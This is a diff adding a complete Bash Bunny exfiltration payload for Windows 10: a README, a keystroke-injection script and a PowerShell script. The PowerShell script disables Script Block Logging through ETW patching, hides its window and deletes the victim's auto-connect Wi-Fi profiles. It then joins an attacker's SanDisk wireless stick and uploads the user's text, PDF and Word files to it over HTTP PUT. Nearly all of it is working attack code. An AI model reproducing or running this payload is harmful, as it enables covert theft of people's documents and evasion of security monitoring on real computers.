SanDisk Wireless Stick Exfiltration (#445)

Uses the "SanDisk Wireless Stick" for files exfiltration.
1) Avoids "PowerShell Script Block Logging".
2) Hide "PowerShell" window.
3) Deletes Wi-Fi connection profiles in automatic mode, each deletion causes a disconnection.
4) Adds the profile for the "SanDisk Connect Wireless Stick" in automatic mode.
5) Checks whether the Wi-Fi interface is connected to the "SanDisk" and whether the gateway can be reached, if not, automatically starts again.
6) Exfiltration of the files via the HTTP channel.

payloads/library/exfiltration/SanDisk-Wireless-Stick_Exfiltration/README.md

@@ -0,0 +1,40 @@
+# Files Exfiltration with "SanDisk Wireless Stick"
+
+- Title:         "SanDisk Wireless Stick" Exfiltration
+- Author:        TW-D
+- Version:       1.0
+- Target:        Microsoft Windows 10
+- Category:      Exfiltration
+
+## Description
+
+Uses the "SanDisk Wireless Stick" for files exfiltration.
+1) Avoids "PowerShell Script Block Logging".
+2) Hide "PowerShell" window.
+3) Deletes Wi-Fi connection profiles in automatic mode, each deletion causes a disconnection.
+4) Adds the profile for the "SanDisk Connect Wireless Stick" in automatic mode.
+5) Checks whether the Wi-Fi interface is connected to the "SanDisk" and whether the gateway can be reached, if not, automatically starts again.
+6) Exfiltration of the files via the HTTP channel.
+
+## Configuration
+
+In the web interface of the "SanDisk Wireless Stick" after update, change the following values :
+
+![SanDisk-Configuration.png](./assets/SanDisk-Configuration.png)
+
+From "payload.txt" change the values of the following constants :
+```bash
+######## INITIALIZATION ########
+
+readonly BB_LABEL="BashBunny"
+
+readonly SANDISK_SSID="HAK5-EXFIL"
+readonly SANDISK_PSK="MyS3cr3TP@sSw0rD"
+readonly SANDISK_LOOT="loots"
+readonly USER_DIRECTORY="~\\"
+readonly FILE_EXTENSION="*.txt,*.pdf,*.docx"
+
+```
+
+## Link
+[SanDisk Vendor](https://www.sandisk.com/goto/connect)

payloads/library/exfiltration/SanDisk-Wireless-Stick_Exfiltration/payload.ps1

@@ -0,0 +1,159 @@
+#
+# Author:       TW-D
+# Version:      1.0
+#
+
+param (
+    [string] $SSID,
+    [string] $PSK,
+    [string] $LOOT,
+	[string] $DIRECTORY,
+	[string] $EXTENSION
+)
+
+# Avoids "PowerShell Script Block Logging".
+#
+$etw_provider = [Ref].Assembly.GetType("System.Management.Automation.Tracing.PSEtwLogProvider").GetField("etwProvider", "NonPublic,Static")
+$event_provider = New-Object System.Diagnostics.Eventing.EventProvider -ArgumentList @([Guid]::NewGuid())
+$etw_provider.SetValue($null, $event_provider)
+
+# Hide "PowerShell" window.
+#
+$Script:showWindowAsync = Add-Type -MemberDefinition @"
+[DllImport("user32.dll")]
+public static extern bool ShowWindowAsync(IntPtr hWnd, int nCmdShow);
+"@ -Name "Win32ShowWindowAsync" -Namespace Win32Functions -PassThru
+$showWindowAsync::ShowWindowAsync((Get-Process -Id $pid).MainWindowHandle, 0) | Out-Null
+
+If ($SSID -And $PSK -And $LOOT -And $DIRECTORY -And $EXTENSION) {
+
+    # Deletes Wi-Fi connection profiles in automatic mode, each deletion causes a disconnection.
+    # 
+    $interface_guid = (Get-NetAdapter -Physical -Name "Wi-Fi" | WHERE Status -eq "Up").InterfaceGuid
+    If ($interface_guid) {
+        $wlan_service_path = "C:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\${interface_guid}\"
+        $wlan_service_items = Get-ChildItem -Path $wlan_service_path -Recurse
+        $wlan_service_items | ForEach-Object {
+            [xml] $xml_content = Get-Content -Path $_.FullName
+            $mode = $xml_content.WLANProfile.connectionMode
+            $name = $xml_content.WLANProfile.name
+            If ($mode -eq "auto") {
+                (NETSH WLAN DELETE PROFILE name="$name") | Out-Null
+            }
+        }
+    }
+
+    # Adds the profile for the "SanDisk Connect Wireless Stick" in automatic mode.
+    #
+    $profile_guid = "{" + [guid]::NewGuid().ToString() + "}"
+    $profile_path = "${env:TEMP}\${profile_guid}.xml"
+    $ssid_hex = ($SSID.ToCharArray() | ForEach-Object { [System.String]::Format("{0:X}", [System.Convert]::ToUInt32($_)) })
+@"
+<?xml version="1.0"?>
+<WLANProfile xmlns="http://www.microsoft.com/networking/WLAN/profile/v1">
+	<name>${SSID}</name>
+	<SSIDConfig>
+		<SSID>
+			<hex>${ssid_hex}</hex>
+			<name>${SSID}</name>
+		</SSID>
+	</SSIDConfig>
+	<connectionType>ESS</connectionType>
+	<connectionMode>auto</connectionMode>
+	<MSM>
+		<security>
+			<authEncryption>
+				<authentication>WPA2PSK</authentication>
+				<encryption>AES</encryption>
+				<useOneX>false</useOneX>
+			</authEncryption>
+			<sharedKey>
+				<keyType>passPhrase</keyType>
+				<protected>false</protected>
+				<keyMaterial>${PSK}</keyMaterial>
+			</sharedKey>
+		</security>
+	</MSM>
+	<MacRandomization xmlns="http://www.microsoft.com/networking/WLAN/profile/v3">
+		<enableRandomization>false</enableRandomization>
+	</MacRandomization>
+</WLANProfile>
+"@ | Out-File -FilePath "${profile_path}"
+
+    (NETSH WLAN ADD PROFILE filename="${profile_path}") | Out-Null
+    Remove-Item -Path "${profile_path}" -Force
+
+	# Checks whether the Wi-Fi interface is connected to the "SanDisk".
+	# Whether the gateway can be reached.
+	# If not, automatically starts again.
+	#
+	While ($TRUE) {
+		$ConnectionError = $NULL
+		Try {
+			(NETSH WLAN CONNECT name="$SSID") | Out-Null
+			$wifi_connected = (Get-NetConnectionProfile).Name
+			$gateway_address = (Get-NetRoute -DestinationPrefix 0.0.0.0/0 | Select-Object -ExpandProperty NextHop)
+			$gateway_reachable = (Test-Connection -ComputerName $gateway_address -Quiet)
+			If ($wifi_connected -eq $SSID -And $gateway_reachable) {
+				Break
+			}
+		} Catch {
+			$ConnectionError = $_
+			Start-Sleep -Seconds 8
+		}
+	}
+
+	#
+	# Exfiltration of the files via the HTTP channel.
+	#
+
+	Function Invoke-CustomRequest($Url, $Method) {
+		$RequestError = $NULL
+		Try {
+			$request = [System.Net.WebRequest]::Create($Url)
+			$request.Method = $Method
+			$request.GetResponse().Close()
+		} Catch {
+			$RequestError = $_
+			return $FALSE
+		}
+		return $TRUE
+	}
+
+	Function Invoke-UploadRequest($Url, $File) {
+		$RestError = $NULL
+		Try {
+			$empty = [String]::IsNullOrWhiteSpace((Get-Content -Path $File))
+			If (!$empty) {
+				Invoke-RestMethod -Uri $Url -Method PUT -InFile $File
+			}
+		} Catch {
+			$RestError = $_
+		}
+	}
+
+	Function Exfiltration-Files($Directory, $Extension, $Url) {
+		$files = Get-ChildItem -Path $Directory -Include ($Extension.split(",")) -Recurse
+		ForEach ($file in $files) {
+			$random = ( -join ( (0x30..0x39) + ( 0x41..0x5A) + ( 0x61..0x7A) | Get-Random -Count 8  | % {[char]$_} ) )
+			$basename = Split-Path -Path "${file}" -Leaf -Resolve
+			Invoke-UploadRequest -Url "${Url}${random}-${basename}" -File "${file}" | Out-Null
+		}
+	}
+
+	$sandisk_loot = "http://${gateway_address}/myconnect/${LOOT}/"
+	
+	$check_loot = Invoke-CustomRequest -Url $sandisk_loot -Method "GET"
+	If ($check_loot) {
+		Exfiltration-Files -Directory $DIRECTORY -Extension $EXTENSION -Url $sandisk_loot
+	} Else {
+		Invoke-CustomRequest -Url $sandisk_loot -Method "MKCOL" | Out-Null
+		Exfiltration-Files -Directory $DIRECTORY -Extension $EXTENSION -Url $sandisk_loot
+	}
+
+	# Cleanup
+	#
+	(NETSH WLAN DELETE PROFILE name="$SSID") | Out-Null
+	Exit
+
+}

payloads/library/exfiltration/SanDisk-Wireless-Stick_Exfiltration/payload.txt

@@ -0,0 +1,74 @@
+#!/bin/bash
+#
+# Title:            SanDisk Wireless Stick Exfiltration
+#
+# Description:      Files Exfiltration with "SanDisk Wireless Stick"
+#
+# Author:           TW-D
+# Version:          1.0
+# Category:         Exfiltration
+# Target:           Microsoft Windows 10
+# Attackmodes:      HID and STORAGE
+#
+# TESTED ON
+# ===============
+# Microsoft Windows 10 Family Version 1903 (PowerShell 5.1)
+# Microsoft Windows 10 Professional Version 20H2 (PowerShell 5.1)
+#
+# REQUIREMENTS
+# ===============
+# SanDisk Wireless Stick 16Go/32Go - Firmware 4.1.0 (2050)
+#
+# STATUS
+# ===============
+# Magenta solid ................................... SETUP
+# Yellow single blink ............................. ATTACK
+# Yellow double blink ............................. STAGE2
+# Yellow triple blink ............................. STAGE3
+# Green 1000ms VERYFAST blink followed by SOLID ... FINISH
+#
+
+######## INITIALIZATION ########
+
+readonly BB_LABEL="BashBunny"
+
+readonly SANDISK_SSID="HAK5-EXFIL"
+readonly SANDISK_PSK="MyS3cr3TP@sSw0rD"
+readonly SANDISK_LOOT="loots"
+readonly USER_DIRECTORY="~\\"
+readonly FILE_EXTENSION="*.txt,*.pdf,*.docx"
+
+######## SETUP ########
+
+LED SETUP
+
+ATTACKMODE HID STORAGE
+GET SWITCH_POSITION
+
+######## ATTACK ########
+
+LED ATTACK
+
+RUN WIN "powershell -NoLogo -NoProfile -ExecutionPolicy Bypass"
+Q DELAY 5000
+
+LED STAGE2
+
+Q STRING "\$BB_VOLUME = \"\$((Get-WmiObject -Class Win32_Volume -Filter \"Label LIKE '${BB_LABEL}'\").Name)payloads\\${SWITCH_POSITION}\\\""
+Q ENTER
+Q DELAY 3500
+Q STRING "CD \"\${BB_VOLUME}\""
+Q ENTER
+Q DELAY 1500
+
+LED STAGE3
+
+Q STRING ".\payload.ps1 -SSID \"${SANDISK_SSID}\" -PSK \"${SANDISK_PSK}\" -LOOT \"${SANDISK_LOOT}\" -DIRECTORY \"${USER_DIRECTORY}\" -EXTENSION \"${FILE_EXTENSION}\""
+Q ENTER
+Q DELAY 1500
+
+######## FINISH ########
+
+LED FINISH
+
+shutdown -h 0